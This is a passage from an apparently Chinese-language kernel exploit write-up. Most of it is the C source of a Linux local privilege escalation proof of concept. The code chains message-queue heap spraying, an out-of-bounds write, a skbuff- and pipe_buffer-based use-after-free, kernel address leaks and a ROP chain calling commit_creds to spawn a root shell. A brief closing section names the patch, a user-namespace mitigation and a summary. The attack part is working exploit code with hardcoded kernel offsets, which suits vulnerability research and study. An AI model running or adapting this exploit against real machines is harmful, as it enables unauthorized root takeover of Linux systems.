    perror("[-] sched_setaffinity");
    return -1;
}

/*
 * Send one message on queue @id.
 *
 * @msgp points at a buffer that starts with a `long` type field; that field
 * is overwritten with @msgtyp before sending (note: this writes through a
 * pointer declared const). @msgsz is the size of the whole buffer, so the
 * payload length handed to msgsnd() is @msgsz minus sizeof(long).
 *
 * Returns 0 on success, -1 (after perror) on failure.
 */
int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
    long *type_field = (long *)msgp;
    size_t payload_len = msgsz - sizeof(long);

    *type_field = msgtyp;
    if (msgsnd(id, msgp, payload_len, 0) >= 0)
        return 0;

    perror("[-] msgsnd");
    return -1;
}

/*
 * Receive (and thereby remove) one message of type @msgtyp from queue @id
 * into @msgp. @msgsz is the size of the whole buffer including its leading
 * `long` type field.
 *
 * Returns 0 on success, -1 (after perror) on failure.
 */
int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
    size_t payload_len = msgsz - sizeof(long);

    if (msgrcv(id, msgp, payload_len, msgtyp, 0) >= 0)
        return 0;

    perror("[-] msgrcv");
    return -1;
}

/*
 * Copy the message at position @index of queue @id into @msgp without
 * removing it (MSG_COPY | IPC_NOWAIT). @msgsz is the size of the whole
 * buffer including its leading `long` type field.
 *
 * Returns 0 on success, -1 (after perror) on failure.
 */
int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
    const int flags = MSG_COPY | IPC_NOWAIT;
    size_t payload_len = msgsz - sizeof(long);

    if (msgrcv(id, msgp, payload_len, index, flags) >= 0)
        return 0;

    perror("[-] msgrcv");
    return -1;
}

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
    msg->m_list_next = m_list_next;
    msg->m_list_prev = m_list_prev;
    msg->m_type = MTYPE_FAKE;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = 0;
}

/*
 * Write @size bytes from @buf NUM_SKBUFFS times into the first descriptor
 * of each of the NUM_SOCKETS socket pairs, pair by pair.
 *
 * Returns 0 when every write succeeds, -1 (after perror) on the first
 * failing write.
 */
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
    const int total_writes = NUM_SOCKETS * NUM_SKBUFFS;

    for (int n = 0; n < total_writes; n++)
    {
        /* Consecutive runs of NUM_SKBUFFS writes go to the same pair. */
        int tx_fd = ss[n / NUM_SKBUFFS][0];

        if (write(tx_fd, buf, size) < 0)
        {
            perror("[-] write");
            return -1;
        }
    }

    return 0;
}

/*
 * Read back NUM_SKBUFFS times from the second descriptor of each of the
 * NUM_SOCKETS socket pairs, pair by pair, up to @size bytes per read into
 * @buf (each read overwrites the previous contents).
 *
 * Returns 0 when every read succeeds, -1 (after perror) on the first
 * failing read.
 */
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size)
{
    const int total_reads = NUM_SOCKETS * NUM_SKBUFFS;

    for (int n = 0; n < total_reads; n++)
    {
        /* Consecutive runs of NUM_SKBUFFS reads come from the same pair. */
        int rx_fd = ss[n / NUM_SKBUFFS][1];

        if (read(rx_fd, buf, size) < 0)
        {
            perror("[-] read");
            return -1;
        }
    }

    return 0;
}

/*
 * Driver for the proof of concept. It runs the stages in the order the
 * article describes them: environment setup, message-queue spraying, hole
 * creation, the table-replace request, detection of the affected queue,
 * the two address leaks, the pipe_buffer stage, and finally the uid check.
 *
 * Returns -1 if setup fails before any message queue exists. Every later
 * failure jumps to `ret`, which removes the message queues and returns 0.
 *
 * Review fixes relative to the published listing:
 *  - the socketpair() loop was bounded by NUM_PIPEFDS although `ss` has
 *    only NUM_SOCKETS rows, writing far past the end of the array;
 *  - a msgget() failure is now reported instead of exiting silently;
 *  - one diagnostic was missing its trailing newline;
 *  - the unused `primary_buf` local is gone.
 */
int main(int argc, char const *argv[])
{
    int s;
    int msqid[NUM_MSQIDS];
    int ss[NUM_SOCKETS][2];
    int pipefd[NUM_PIPEFDS][2];
    int fake_id = -1, real_id = -1;
    char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
    struct msg_msg *msg;
    uint64_t kheap = 0, msg_fake_addr = 0;
    uint64_t pipe_buffer_ops = 0, kernel_base = 0, kernel_offset = 0;
    struct pipe_buf_operations *ops;
    struct pipe_buffer *buf;
    int ridx = 0;
    uint64_t *rop;

    if (setup_sandbox() < 0)
        return -1;

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("socket");
        return -1;
    }

    /* One socket pair per row of ss[]; the bound must match its size. */
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0)
        {
            perror("socketpair");
            return -1;
        }
    }

    puts("[*] Setup message queues");
    /* -1 marks "not created" so the cleanup loop can skip unused slots. */
    memset(msqid, -1, sizeof(msqid));
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0)
        {
            perror("[-] msgget");
            goto ret;
        }
    }

    /* Each message carries MSG_TAG and its queue index in its first 8
     * bytes so that a message can later be attributed to its queue. */
    puts("[*] Spraying primary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_primary, 0, sizeof(msg_primary));
        *(int *)&msg_primary.mtext[0] = MSG_TAG;
        *(int *)&msg_primary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
        {
            goto ret;
        }
    }

    puts("[*] Spraying secondary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
            goto ret;
    }

    /* Receive every HOLE_STEP-th primary message (starting at HOLE_STEP). */
    puts("[*]  Creating holes in primary messages...");
    for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
    {
        if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
            goto ret;
    }

    puts("[*] Trigger oob write");
    if (trigger_oob_write(s) < 0)
        goto ret;

    /* Peek the message at index 1 of every queue that still has its
     * primary message; a stored index that differs from the queue's own
     * index identifies the affected pair of queues. */
    puts("[*] Searching for corrupted primary message...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (i != 0 && !(i % HOLE_STEP))
            continue;

        if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
            goto ret;

        if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
        {
            printf("[-] MSG_TAG error\n");
            goto ret;
        }

        if (*(int *)&msg_secondary.mtext[4] != i)
        {
            real_id = *(int *)&msg_secondary.mtext[4];
            fake_id = i;
            break;
        }
    }

    if (real_id == -1 && fake_id == -1)
    {
        printf("[-] Could not corrupt any primary message\n");
        goto ret;
    }

    printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);

    puts("[*] Free secondary message and then gain UAF");
    if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking adjacent secondary message...");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak adjacent secondary message\n");
        goto ret;
    }

    /* Take whichever list link is PRIMARY_SIZE-aligned. */
    msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
    kheap = msg->m_list_next; // kheap pointer to the primary message
    if (kheap & (PRIMARY_SIZE - 1))
        kheap = msg->m_list_prev;
    printf("[+] kheap = %#" PRIx64 "\n", kheap);

    puts("[*] Freeing skb...");
    if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking address of msg_fake");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak address of msg_fake\n");
        goto ret;
    }

    /* Take whichever list link is SECONDARY_SIZE-aligned, then step back
     * one SECONDARY_SIZE slot. */
    msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
    msg_fake_addr = msg->m_list_next;
    if (msg_fake_addr & (SECONDARY_SIZE - 1))
        msg_fake_addr = msg->m_list_prev;
    msg_fake_addr -= SECONDARY_SIZE;
    printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);

    puts("[*] Free secondary message and then gain UAF controlled by skb");
    if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
        goto ret;

    puts("[*] Spraying pipe_buffer objects...");
    for (int i = 0; i < NUM_PIPEFDS; i++)
    {
        if (pipe(pipefd[i]) < 0)
        {
            perror("[-] pipe");
            goto ret;
        }

        if (write(pipefd[i][1], "xi4oyu", 6) < 0)
        {
            perror("[-] write");
            goto ret;
        }
    }

    /* Drain every queued buffer; any buffer whose word at offset 0x10 is
     * not MTYPE_FAKE supplies the ops pointer (the last such one wins). */
    puts("[*] Leaking and freeing pipe_buffer object...");
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
            {
                perror("[-] read");
                goto ret;
            }

            if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
            {
                pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
                // break; // free all
            }
        }
    }

    /* All absolute addresses below are specific to the one kernel build
     * the article targets. */
    kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
    kernel_base = kernel_offset + 0xffffffff81000000;
    printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
    printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
    printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);

    puts("[*] Spraying fake pipe_buffer...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    buf = (struct pipe_buffer *)secondary_buf;
    buf->ops = msg_fake_addr + 0x200;
    ops = (struct pipe_buf_operations *)&secondary_buf[0x200];

    ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]

    *(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9;    // add rsp, 0xd0 ; ret
    *(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
    rop = (uint64_t *)&secondary_buf[0xd0 + 8];
    ridx = 0;
    rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
    rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
    rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
    rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret

    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Releasing pipe_buffer objects...");
    for (int i = 0; i < NUM_PIPEFDS; i++)
    {
        if (close(pipefd[i][0]) < 0)
        {
            perror("[-] close");
            goto ret;
        }
        if (close(pipefd[i][1]) < 0)
        {
            perror("[-] close");
            goto ret;
        }
    }

    getRootShell();

ret:
    /* Remove every queue that was actually created. */
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (msqid[i] < 0)
            continue;

        if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
            perror("[-] msgctl rmid");
    }

    return 0;
}

漏洞修复

漏洞的修复很粗暴，就直接把 memset 这部分给去掉了，具体看 patch

还有个缓解措施是，禁用用户命名空间的功能来阻止普通用户拿到 CAP_NET_ADMIN 权限，参考：

echo 0 > /proc/sys/user/max_user_namespaces

总结

从溢出写 0 到 UAF 这里非常的巧妙，随后的 skb 和 pipe_buffer 结合利用 UAF 的思路应该是十分具备参考性的，非常值得学习

文中未明确提到的参考：